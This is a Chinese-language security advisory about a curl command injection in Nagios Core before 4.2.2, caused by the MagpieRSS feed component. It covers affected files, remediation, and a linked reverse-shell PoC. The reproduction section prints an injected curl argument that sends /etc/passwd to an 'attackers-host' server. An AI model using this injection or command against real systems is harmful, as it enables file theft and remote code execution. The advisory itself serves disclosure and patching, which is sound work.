Nagios Core < 4.2.2 Curl Command Injection/Code Execution

nagios_xi_featured_image_updated_dashboard_2

简介

Nagios是一个监视系统运行状态和网络信息的监视系统。Nagios能监视所指定的本地或远程主机以及服务,同时提供异常通知功能等。Nagios可运行在Linux/Unix平台之上,同时提供一个可选的基于浏览器的WEB界面以方便系统管理人员查看网络状态,各种系统问题,以及日志等等。

概述

Nagios Core附带一个PHP/CGI前端,允许查看受监控主机的状态。 此前端包含RSS Feed中的漏洞阅读器类,可以使攻击者模仿feed source。向curl命令注入恶意参数并有效地读/写目标Nagios服务器上的任意文件。若Nagios遵循官方文档的安装方式,该漏洞还可能导致在www-data/nagios用户的上下文中执行任意代码。

漏洞厂商https://www.nagios.org/

漏洞名称Nagios Core < 4.2.2 Curl Command Injection / Code Execution

影响版本Nagios Core <4.2.2

严重级别High

漏洞危害:远程代码执行

修复版本Nagios Core 4.2.2

漏洞分析

该漏洞是由于使用易受攻击的组件来处理RSS新闻源,即Nagios Core控制面板/前端中的MagpieRSS组件。 Nagios前端使用该组件在登录时从远程源加载新闻源。在登录时, Nagios前端使用该组件从远程源源加载新闻源,发现该组件易受CVE-2008-4796攻击。

下面是来存在漏洞的RSS类代码的相关部分:

20161214165901

受影响的三个文件:

  • rss-corefeed.php
  • rss-corebanner.php
  • rss-newsfeed.php

rss-corefeed.php

20161214164400

 

PoC

https://github.com/0xwindows/VulScritp/blob/master/nagios/nagios_cmd_injection.py

Usage:

./nagios_cmd_injection.py reverse_shell_ip [reverse_shell_port]

漏洞复现

注入命令:

https://attackers-host/get-data.php -Fpasswd=@/etc/passwd

最终在Nagios系统执行

curl -D /tmp/$headerfile https://attackers-host/get-data.php -Fpasswd=@/etc/passwd

模拟:

nagios1

nagios2

更多请参考:https://legalhackers.com/advisories/Nagios-Exploit-Command-Injection-CVE-2016-9565-2008-4796.html

修复方案

删除

  • rss-corefeed.php
  • rss-corebanner.php
  • rss-newsfeed.php

升级至最新版

参考

 

*转载请注明来自MottoIN

原创文章,作者:0c0c0f,如若转载,请注明出处:http://www.mottoin.com/article/web/93936.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code